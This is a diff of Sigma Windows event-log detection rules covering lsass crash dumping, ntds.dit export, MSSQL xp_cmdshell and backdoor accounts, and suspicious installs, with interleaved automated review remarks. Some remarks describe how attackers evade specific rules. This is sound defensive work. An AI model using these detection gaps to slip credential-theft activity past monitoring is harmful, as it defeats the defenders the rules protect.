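Review bot: The new `# Information level` comment on `Level: 4` names the level but not why those events are excluded, which is the security-relevant part: any product that logs a detection containing one of the listed keywords at Information severity is silently dropped by `filter_optional_information` before the `condition` is evaluated. Presumably the intent is to suppress routine notices (signature updates, scan summaries) that mention malware family names — worth confirming and stating, e.g. `# Information level - dropped to suppress routine AV notices that mention family names; verify your AV does not log detections at this level`. The `keywords` list this hunk belongs to starts before the hunk.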
--- a/sigma/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml
+++ b/sigma/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml
@@ -1,9 +1,7 @@
 title: Potential Credential Dumping Via WER - Application
 id: a18e0862-127b-43ca-be12-1a542c75c7c5
 status: test
-description: Detects Windows error reporting event where the process that crashed
- is lsass. This could be the cause of an intentional crash by techniques such as
- Lsass-Shtinkering to dump credential
+description: Detects Windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential
 references:
 - https://github.com/deepinstinct/Lsass-Shtinkering
 - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf
@@ -23,7 +21,7 @@ detection:
 Provider_Name: Application Error
 EventID: 1000
 AppName: lsass.exe
- ExceptionCode: c0000001
+ ExceptionCode: c0000001 # STATUS_UNSUCCESSFUL
 condition: application and selection
 falsepositives:
 - Rare legitimate crashing of the lsass process
diff --git a/sigma/builtin/application/esent/win_esent_ntdsutil_abuse.yml b/sigma/builtin/application/esent/win_esent_ntdsutil_abuse.yml
index 2d504992e..54898dca6 100644
--- a/sigma/builtin/application/esent/win_esent_ntdsutil_abuse.yml
+++ b/sigma/builtin/application/esent/win_esent_ntdsutil_abuse.yml
@@ -13,6 +13,7 @@ tags:
 logsource:
 product: windows
 service: application
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
 detection:
 application:
 Channel: Application
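Review bot: The new comment on `ExceptionCode: c0000001` names the NTSTATUS but leaves the rule's main limitation undocumented: the Lsass-Shtinkering technique this rule references has the attacker's process hand WER a fabricated exception record for lsass, so the reported code is presumably attacker-chosen and a one-line change to the public PoC would slip past an exact match — worth confirming against the referenced repository. Suggest extending the comment to `# STATUS_UNSUCCESSFUL - the value the public Lsass-Shtinkering PoC reports; the code is attacker-supplied, so for hunting consider EventID 1000 with AppName lsass.exe regardless of ExceptionCode`. The `selection` map this line belongs to begins before the hunk.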
diff --git a/sigma/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml b/sigma/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml
index cb1738aba..2a9b1485f 100644
--- a/sigma/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml
+++ b/sigma/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml
@@ -1,8 +1,7 @@
 title: Dump Ntds.dit To Suspicious Location
 id: 94dc4390-6b7c-4784-8ffc-335334404650
 status: test
-description: Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious
- location
+description: Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location
 references:
 - https://twitter.com/mgreen27/status/1558223256704122882
 - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)
@@ -14,15 +13,17 @@ tags:
 logsource:
 product: windows
 service: application
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
 detection:
 application:
 Channel: Application
 selection_root:
 Provider_Name: ESENT
- EventID: 325
+ EventID: 325 # New Database Created
 Data|contains: ntds.dit
 selection_paths:
 Data|contains:
+ # Add more locations that you don't use in your env or that are just suspicious
 - :\ntds.dit
 - \Appdata\
 - \Desktop\
diff --git a/sigma/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml b/sigma/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml
index 0b6e91170..5aea8a523 100644
--- a/sigma/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml
+++ b/sigma/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml
@@ -1,20 +1,15 @@
 title: Audit CVE Event
 id: 48d91a3a-2363-43ba-a456-ca71ac3da5c2
 status: test
-description: 'Detects events generated by user-mode applications when they call the
- CveEventWrite API when a known vulnerability is trying to be exploited.
-
- MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI
- vulnerability.
-
+description: |
+ Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.
+ MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.
 Unfortunately, that is about the only instance of CVEs being written to this log.
-
- '
 references:
 - https://twitter.com/VM_vivisector/status/1217190929330655232
 - https://twitter.com/DidierStevens/status/1217533958096924676
 - https://twitter.com/FlemmingRiis/status/1217147415482060800
- - https://www.youtube.com/watch?v=ebmW42YYveI
+ - https://www.youtube.com/watch?v=ebmW42YYveI # "CVEs in Windows Event Logs? What You Need to Know" by 13Cubed.
 - https://nullsec.us/windows-event-log-audit-cve/
 author: Florian Roth (Nextron Systems), Zach Mathis
 date: 2020/01/15
diff --git a/sigma/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml b/sigma/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml
index 849d6c2cb..e92e1b0e6 100644
--- a/sigma/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml
+++ b/sigma/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml
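Review bot: The reflowed block-scalar description keeps an unclosed parenthesis in the new line `MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.`; while the text is being rewritten, close it as `(a Windows CryptoAPI vulnerability).`. The third sentence, `Unfortunately, that is about the only instance of CVEs being written to this log.`, is carried over as a context line from the old single-quoted scalar, so its indentation under the new `|` indicator should be checked in the actual file — the collapsed view here does not show whether it aligns with the two added lines, and a shallower indent would terminate the block scalar early.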
@@ -1,8 +1,7 @@
 title: Restricted Software Access By SRP
 id: b4c8da4a-1c12-46b0-8a2b-0a8521d03442
 status: test
-description: Detects restricted access to applications by the Software Restriction
- Policies (SRP) policy
+description: Detects restricted access to applications by the Software Restriction Policies (SRP) policy
 references:
 - https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies
 - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv
@@ -20,11 +19,11 @@ detection:
 selection:
 Provider_Name: Microsoft-Windows-SoftwareRestrictionPolicies
 EventID:
- - 865
- - 866
- - 867
- - 868
- - 882
+ - 865 # Access to %1 has been restricted by your Administrator by the default software restriction policy level
+ - 866 # Access to %1 has been restricted by your Administrator by location with policy rule %2 placed on path %3.
+ - 867 # Access to %1 has been restricted by your Administrator by software publisher policy.
+ - 868 # Access to %1 has been restricted by your Administrator by policy rule %2.
+ - 882 # Access to %1 has been restricted by your Administrator by policy rule %2.
 condition: application and selection
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/application/msiinstaller/win_builtin_remove_application.yml b/sigma/builtin/application/msiinstaller/win_builtin_remove_application.yml
index 43d5557ff..4bd0a5a1a 100644
--- a/sigma/builtin/application/msiinstaller/win_builtin_remove_application.yml
+++ b/sigma/builtin/application/msiinstaller/win_builtin_remove_application.yml
@@ -22,5 +22,6 @@ detection:
 condition: application and selection
 falsepositives:
 - Unknown
+# Level is low as it can be very verbose, you can use the top or less 10 "Product Name" to have a quick overview
 level: low
 ruletype: Sigma
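Review bot: The new comments on `868` and `882` are word-for-word identical (`...restricted by your Administrator by policy rule %2.`), so they do not help a reader tell the two events apart; if they correspond to different SRP rule types, say which (e.g. `# 868 - <rule type>, 882 - <rule type>`) after confirming against the provider manifest, otherwise state that both carry the same message template. Separately, the second reference in the file's header hunk points to `Microsoft-Windows-AppXDeployment-Server.csv`, which looks like a copy-paste from another rule — the `Microsoft-Windows-SoftwareRestrictionPolicies` CSV from the same repository is presumably what these message strings were taken from and would be the reference worth citing.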
diff --git a/sigma/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml b/sigma/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml
index e7869d165..9478ade79 100644
--- a/sigma/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml
+++ b/sigma/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml
@@ -12,6 +12,7 @@ tags:
 logsource:
 product: windows
 service: application
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
 detection:
 application:
 Channel: Application
@@ -21,19 +22,20 @@ detection:
 - 1040
 - 1042
 Data|contains:
+ # Add more suspicious paths
 - :\Windows\TEMP\
 - \\\\
 - \Desktop\
 - \PerfLogs\
 - \Users\Public\
+ # - '\AppData\Local\Temp\' # too many FPs
+ # - '\Downloads\' # too many FPs, typical legitimate staging directory
 filter_winget:
 Data|contains: \AppData\Local\Temp\WinGet\
 filter_updhealthtools:
 Data|contains: C:\Windows\TEMP\UpdHealthTools.msi
 condition: application and (selection and not 1 of filter_*)
 falsepositives:
- - False positives may occur if you allow installation from folders such as the
- desktop, the public folder or remote shares. A baseline is required before
- production use.
+ - False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares. A baseline is required before production use.
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/application/msiinstaller/win_msi_install_from_web.yml b/sigma/builtin/application/msiinstaller/win_msi_install_from_web.yml
index 72879d895..f0c178ed5 100644
--- a/sigma/builtin/application/msiinstaller/win_msi_install_from_web.yml
+++ b/sigma/builtin/application/msiinstaller/win_msi_install_from_web.yml
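Review bot: `filter_updhealthtools` excludes on nothing but the path string `C:\Windows\TEMP\UpdHealthTools.msi`, so any package staged under that name in the same temp directory is exempted from the rule, and the hunk adds comments for the selection paths but no caveat for this exclusion. Suggest a comment on the filter such as `# Name-based exclusion: a malicious MSI staged as \Windows\TEMP\UpdHealthTools.msi also bypasses this rule; corroborate with the product/publisher details of the same event where your backend exposes them`. Also, with `\AppData\Local\Temp\` now left commented out in the selection, `filter_winget` can only take effect when an event's `Data` additionally contains one of the remaining paths, so either note that it is kept for when the Temp entry is re-enabled or drop it; the `selection` map begins before this hunk.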
@@ -14,6 +14,7 @@ tags:
 logsource:
 product: windows
 service: application
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
 detection:
 application:
 Channel: Application
diff --git a/sigma/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml b/sigma/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml
index c5cc481e8..b695e6db2 100644
--- a/sigma/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml
+++ b/sigma/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml
@@ -1,8 +1,7 @@
 title: Atera Agent Installation
 id: 87261fb2-69d0-42fe-b9de-88c6b5f65a43
 status: test
-description: Detects successful installation of Atera Remote Monitoring & Management
- (RMM) agent as recently found to be used by Conti operators
+description: Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators
 references:
 - https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent
 author: Bhabesh Raj
diff --git a/sigma/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml b/sigma/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml
index 83340d93d..3bcadd343 100644
--- a/sigma/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml
+++ b/sigma/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml
@@ -1,8 +1,7 @@
 title: MSSQL Add Account To Sysadmin Role
 id: 08200f85-2678-463e-9c32-88dce2f073d1
 status: test
-description: Detects when an attacker tries to backdoor the MSSQL server by adding
- a backdoor account to the sysadmin fixed server role
+description: Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role
 references:
 - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -12,8 +11,8 @@ tags:
 logsource:
 product: windows
 service: application
- definition: MSSQL audit policy must be enabled in order to receive this event
- in the application log
+ definition: MSSQL audit policy must be enabled in order to receive this event in the application log
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
 detection:
 application:
 Channel: Application
diff --git a/sigma/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml b/sigma/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml
index 9c893f654..298387a03 100644
--- a/sigma/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml
+++ b/sigma/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml
@@ -1,8 +1,7 @@
 title: MSSQL Disable Audit Settings
 id: 350dfb37-3706-4cdc-9e2e-5e24bc3a46df
 status: test
-description: Detects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER
- AUDIT" transaction in order to delete or disable audit logs on the server
+description: Detects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" transaction in order to delete or disable audit logs on the server
 references:
 - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
 - https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16
@@ -14,8 +13,8 @@ tags:
 logsource:
 product: windows
 service: application
- definition: MSSQL audit policy must be enabled in order to receive this event
- in the application log
+ definition: MSSQL audit policy must be enabled in order to receive this event in the application log
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
 detection:
 application:
 Channel: Application
@@ -27,7 +26,6 @@ detection:
 - statement:DROP SERVER AUDIT
 condition: application and selection
 falsepositives:
- - This event should only fire when an administrator is modifying the audit policy.
- Which should be a rare occurrence once it's set up
+ - This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up
 level: high
 ruletype: Sigma
diff --git a/sigma/builtin/application/mssqlserver/win_mssql_failed_logon.yml b/sigma/builtin/application/mssqlserver/win_mssql_failed_logon.yml
index fe64372b6..970cf5f14 100644
--- a/sigma/builtin/application/mssqlserver/win_mssql_failed_logon.yml
+++ b/sigma/builtin/application/mssqlserver/win_mssql_failed_logon.yml
@@ -1,8 +1,8 @@ title: MSSQL Server Failed Logon id: 218d2855-2bba-4f61-9c85-81d0ea63ac71 related: - - id: ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d - type: similar + - id: ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d + type: similar status: experimental description: Detects failed logon attempts from clients to MSSQL server. author: Nasreddine Bencherchali (Nextron Systems), j4son @@ -25,8 +25,6 @@ detection: EventID: 18456 condition: application and selection falsepositives: - - This event could stem from users changing an account's password that's used - to authenticate via a job or an automated process. Investigate the source - of such events and mitigate them + - This event could stem from users changing an account's password that's used to authenticate via a job or an automated process. Investigate the source of such events and mitigate them level: low ruletype: Sigma diff --git a/sigma/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml b/sigma/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml index 2081e72e8..ef8d21ed4 100644 --- a/sigma/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml +++ b/sigma/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml @@ -1,11 +1,10 @@ title: MSSQL Server Failed Logon From External Network id: ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d related: - - id: 218d2855-2bba-4f61-9c85-81d0ea63ac71 - type: similar + - id: 218d2855-2bba-4f61-9c85-81d0ea63ac71 + type: similar status: experimental -description: Detects failed logon attempts from clients with external network IP to - an MSSQL server. This can be a sign of a bruteforce attack. +description: Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack. author: j4son date: 2023/10/11 references: 
@@ -26,8 +25,8 @@ detection: EventID: 18456 filter_main_local_ips: Data|contains: - - 'CLIENT: 10.' - - 'CLIENT: 172.16.' + - 'CLIENT: 10.' # filter_range_IP: 10.0.0.0/8 + - 'CLIENT: 172.16.' # filter_range_IP: 172.16.0.0/12 - 'CLIENT: 172.17.' - 'CLIENT: 172.18.' - 'CLIENT: 172.19.' @@ -43,9 +42,9 @@ detection: - 'CLIENT: 172.29.' - 'CLIENT: 172.30.' - 'CLIENT: 172.31.' - - 'CLIENT: 192.168.' - - 'CLIENT: 127.' - - 'CLIENT: 169.254.' + - 'CLIENT: 192.168.' # filter_range_IP: 192.168.0.0/16 + - 'CLIENT: 127.' # filter_loop_back: 127.0.0.0/8 + - 'CLIENT: 169.254.' # fileter_link-local_addressing: 169.254.0.0/16 condition: application and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml b/sigma/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml index babe00faa..bf3ad3fc7 100644 --- a/sigma/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml +++ b/sigma/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml @@ -1,9 +1,7 @@ title: MSSQL SPProcoption Set id: b3d57a5c-c92e-4b48-9a79-5f124b7cf964 status: test -description: Detects when the a stored procedure is set or cleared for automatic execution - in MSSQL. A stored procedure that is set to automatic execution runs every time - an instance of SQL Server is started +description: Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started references: - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ - https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16 
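Review bot: The `filter_main_local_ips` list in win_mssql_failed_logon_from_external_network.yml only covers IPv4 prefixes, so a failed logon whose 18456 event carries an IPv6 client (`CLIENT: ::1`, `CLIENT: fe80:...`) or — if the server renders shared-memory connections that way — `CLIENT: <local machine>` would be reported as coming from an external network; worth confirming against a sample event and adding the matching `'CLIENT: '` prefixes, and 100.64.0.0/10 (carrier-grade NAT) is also absent. The added comment on the last entry has a typo, `fileter_link-local_addressing`, and the `filter_range_IP` / `filter_loop_back` labels read like filter names rather than descriptions. The IP-prefix filter in win_bits_client_new_transfer_via_ip_address.yml further down has the same IPv4-only gap.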
@@ -14,8 +12,8 @@ tags: logsource: product: windows service: application - definition: MSSQL audit policy to monitor for 'sp_procoption' must be enabled - in order to receive this event in the application log + definition: MSSQL audit policy to monitor for 'sp_procoption' must be enabled in order to receive this event in the application log + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: application: Channel: Application diff --git a/sigma/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml b/sigma/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml index 52592d402..6ad6865d4 100644 --- a/sigma/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml +++ b/sigma/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml @@ -1,8 +1,7 @@ title: MSSQL XPCmdshell Suspicious Execution id: 7f103213-a04e-4d59-8261-213dddf22314 status: test -description: Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute - commands +description: Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands references: - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ 
@@ -13,8 +12,8 @@ tags: logsource: product: windows service: application - definition: MSSQL audit policy to monitor for 'xp_cmdshell' must be enabled in - order to receive this event in the application log (Follow this tutorial https://dba.stackexchange.com/questions/103183/is-there-any-way-to-monitor-execution-of-xp-cmdshell-in-sql-server-2012) + definition: MSSQL audit policy to monitor for 'xp_cmdshell' must be enabled in order to receive this event in the application log (Follow this tutorial https://dba.stackexchange.com/questions/103183/is-there-any-way-to-monitor-execution-of-xp-cmdshell-in-sql-server-2012) + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: application: Channel: Application @@ -22,6 +21,7 @@ detection: Provider_Name: MSSQLSERVER EventID: 33205 Data|contains|all: + # You can modify this to include specific commands - object_name:xp_cmdshell - statement:EXEC condition: application and selection diff --git a/sigma/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml b/sigma/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml index abbab96ce..bff8d735d 100644 --- a/sigma/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml +++ b/sigma/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml @@ -12,6 +12,7 @@ tags: logsource: product: windows service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: application: Channel: Application 
@@ -22,7 +23,6 @@ detection: condition: application and selection falsepositives: - Legitimate enable/disable of the setting - - Note that since the event contain the change for both values. This means that - this will trigger on both enable and disable + - Note that since the event contain the change for both values. This means that this will trigger on both enable and disable level: high ruletype: Sigma diff --git a/sigma/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml b/sigma/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml index ba4578c7e..f00075407 100644 --- a/sigma/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml +++ b/sigma/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml @@ -1,8 +1,8 @@ title: Remote Access Tool - ScreenConnect Command Execution id: 076ebe48-cc05-4d8f-9d41-89245cd93a14 related: - - id: b1f73849-6329-4069-bc8f-78a604bb8b23 - type: similar + - id: b1f73849-6329-4069-bc8f-78a604bb8b23 + type: similar status: experimental description: Detects command execution via ScreenConnect RMM references: diff --git a/sigma/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml b/sigma/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml index 217afc973..7de1939eb 100644 --- a/sigma/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml +++ b/sigma/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml 
@@ -1,8 +1,8 @@
 title: Remote Access Tool - ScreenConnect File Transfer
 id: 5d19eb78-5b5b-4ef2-a9f0-4bfa94d58a13
 related:
- - id: b1f73849-6329-4069-bc8f-78a604bb8b23
- type: similar
+ - id: b1f73849-6329-4069-bc8f-78a604bb8b23
+ type: similar
 status: experimental
 description: Detects file being transferred via ScreenConnect RMM
 references:
diff --git a/sigma/builtin/application_error_reporting/win_application_msmpeng_crash_wer.yml b/sigma/builtin/application_error_reporting/win_application_msmpeng_crash_wer.yml
index 3fe7aeb4c..d711bf9ba 100644
--- a/sigma/builtin/application_error_reporting/win_application_msmpeng_crash_wer.yml
+++ b/sigma/builtin/application_error_reporting/win_application_msmpeng_crash_wer.yml
@@ -1,8 +1,7 @@
 title: Microsoft Malware Protection Engine Crash - WER
 id: 6c82cf5c-090d-4d57-9188-533577631108
 status: experimental
-description: This rule detects a suspicious crash of the Microsoft Malware Protection
- Engine
+description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine
 references:
 - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5
 - https://technet.microsoft.com/en-us/library/security/4022344
@@ -16,6 +15,7 @@ tags:
 logsource:
 product: windows
 service: application
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
 detection:
 application:
 Channel: Application
diff --git a/sigma/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml b/sigma/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml
index 4eafe596c..a6d7b1156 100644
--- a/sigma/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml
+++ b/sigma/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml
@@ -1,9 +1,7 @@ title: File Was Not Allowed To Run id: 401e5d00-b944-11ea-8f9a-00163ecd60ae status: test -description: Detect run not allowed files. Applocker is a very useful tool, especially - on servers where unprivileged users have access. For example terminal servers. - You need configure applocker and log collect to receive these events. +description: Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events. references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker diff --git a/sigma/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml b/sigma/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml index 8fd968827..a7570e1a5 100644 --- a/sigma/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml +++ b/sigma/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml @@ -1,9 +1,7 @@ title: Sysinternals Tools AppX Versions Execution id: d29a20b2-be4b-4827-81f2-3d8a59eab5fc status: experimental -description: Detects execution of Sysinternals tools via an AppX package. Attackers - could install the Sysinternals Suite to get access to tools such as psexec and - procdump to avoid detection based on System paths +description: Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) 
diff --git a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml index 39332071e..d19949cf8 100644 --- a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml +++ b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml @@ -1,8 +1,7 @@ title: Potential Malicious AppX Package Installation Attempts id: 09d3b48b-be17-47f5-bf4e-94e7e75d09ce status: test -description: Detects potential installation or installation attempts of known malicious - appx packages +description: Detects potential installation or installation attempts of known malicious appx packages references: - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ @@ -22,10 +21,11 @@ detection: EventID: - 400 - 401 + # Add more malicious package names + # TODO: Investigate the packages here https://github.com/sophoslabs/IoCs/blob/master/Troj-BazarBackdoor.csv based on this report https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ PackageFullName|contains: 3669e262-ec02-4e9d-bcb4-3d008b4afac9 condition: appxdeployment_server and selection falsepositives: - - Rare occasions where a malicious package uses the exact same name and version - as a legtimate application + - Rare occasions where a malicious package uses the exact same name and version as a legtimate application level: medium ruletype: Sigma diff --git a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml index 41c2356ff..99d4f86f5 100644 --- a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml 
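Review bot: The new `# Add more malicious package names` comment in win_appxdeployment_server_mal_appx_names.yml sits above `PackageFullName|contains: 3669e262-ec02-4e9d-bcb4-3d008b4afac9`, which is a scalar, so whoever follows the invitation has to restructure the key before appending anything; writing it as a one-element list now (`PackageFullName|contains:` followed by `- 3669e262-ec02-4e9d-bcb4-3d008b4afac9`) keeps the match identical and makes the comment actionable. The `# TODO:` line carrying the Sophos IoC link is useful, but without a date or tracking reference it will go stale silently; a short `# TODO(2024-01): ...` style prefix would help.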
+++ b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml
@@ -1,8 +1,7 @@
 title: Deployment Of The AppX Package Was Blocked By The Policy
 id: e021bbb5-407f-41f5-9dc9-1864c45a7a51
 status: test
-description: Detects an appx package deployment that was blocked by the local computer
- policy
+description: Detects an appx package deployment that was blocked by the local computer policy
 references:
 - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting
 - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv
diff --git a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml
index 40a71464e..f820524a8 100644
--- a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml
+++ b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml
@@ -1,9 +1,7 @@
 title: Suspicious AppX Package Installation Attempt
 id: 898d5fc9-fbc3-43de-93ad-38e97237c344
 status: test
-description: Detects an appx package installation with the error code "0x80073cff"
- which indicates that the package didn't meet the signing requirements and could
- be suspicious
+description: Detects an appx package installation with the error code "0x80073cff" which indicates that the package didn't meet the signing requirements and could be suspicious
 references:
 - Internal Research
 - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
@@ -21,7 +19,7 @@ detection:
 Channel: Microsoft-Windows-AppXDeploymentServer/Operational
 selection:
 EventID: 401
- ErrorCode: '0x80073cff'
+ ErrorCode: '0x80073cff' # Check ref section to learn more about this error code
 condition: appxdeployment_server and selection
 falsepositives:
 - Legitimate AppX packages not signed by MS used part of an enterprise
